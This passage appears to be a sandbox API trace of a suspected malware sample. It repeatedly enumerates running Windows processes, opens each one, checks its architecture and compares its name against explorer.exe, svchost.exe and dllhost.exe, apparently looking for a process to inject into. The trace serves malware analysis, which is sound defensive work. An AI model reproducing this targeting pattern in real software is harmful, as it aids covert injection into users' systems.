returned -1 [0218.320] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0218.320] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0218.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0218.321] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.321] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.321] CloseHandle (hObject=0xec) returned 1 [0218.321] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0218.321] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0218.321] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0218.321] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0218.321] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0218.321] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.321] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.321] CloseHandle (hObject=0xec) returned 1 [0218.321] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0218.321] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0218.321] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0218.321] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0218.322] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0218.322] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.322] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.322] CloseHandle (hObject=0xec) returned 1 [0218.322] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0218.322] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0218.322] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0218.322] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0218.323] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0218.323] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.323] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.323] CloseHandle (hObject=0xec) returned 1 [0218.323] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0218.323] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0218.323] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0218.323] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0218.323] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0218.323] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.323] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.323] CloseHandle (hObject=0xec) returned 1 [0218.323] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0218.323] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0218.324] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0218.324] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0218.324] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0218.324] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.324] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.324] CloseHandle (hObject=0xec) returned 1 [0218.324] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0218.324] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0218.324] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0218.324] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0218.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0218.325] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.325] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.325] CloseHandle (hObject=0xec) returned 1 [0218.325] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0218.325] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0218.325] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0218.325] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0218.325] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0218.325] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.325] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.326] CloseHandle (hObject=0xec) returned 1 [0218.326] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0218.326] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0218.326] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0218.326] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0218.326] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0218.326] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.326] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.326] CloseHandle (hObject=0xec) returned 1 [0218.326] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0218.326] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0218.326] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0218.326] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0218.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0218.327] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.327] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.327] CloseHandle (hObject=0xec) returned 1 [0218.327] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0218.327] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0218.327] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0218.327] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0218.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0218.328] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0218.328] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0218.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0218.329] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0218.329] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0218.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0218.330] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0218.330] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.330] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.330] CloseHandle (hObject=0xec) returned 1 [0218.330] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0218.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0218.413] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.413] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.413] CloseHandle (hObject=0xec) returned 1 [0218.413] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0218.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0218.414] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0218.414] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.414] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.414] CloseHandle (hObject=0xec) returned 1 [0218.414] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0218.414] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0218.415] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.415] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.415] CloseHandle (hObject=0xec) returned 1 [0218.415] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.416] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0218.416] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.416] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.416] CloseHandle (hObject=0xec) returned 1 [0218.416] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0218.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0218.417] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.417] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0218.417] CloseHandle (hObject=0xec) returned 1 [0218.417] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0218.417] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0218.417] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0218.417] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0218.417] CloseHandle (hObject=0xe8) returned 1 [0218.417] Sleep (dwMilliseconds=0x3e8) [0219.425] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0219.427] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0219.428] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0219.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0219.429] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0219.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0219.429] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0219.430] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0219.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0219.430] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0219.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0219.431] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0219.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0219.431] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0219.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0219.432] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0219.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0219.432] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0219.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0219.433] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0219.433] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0219.434] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0219.434] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0219.435] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0219.436] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0219.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0219.437] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0219.437] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0219.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0219.438] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0219.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0219.438] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.438] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.438] CloseHandle (hObject=0xec) returned 1 [0219.438] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0219.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0219.439] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0219.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0219.439] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.439] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0219.439] CloseHandle (hObject=0xec) returned 1 [0219.439] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 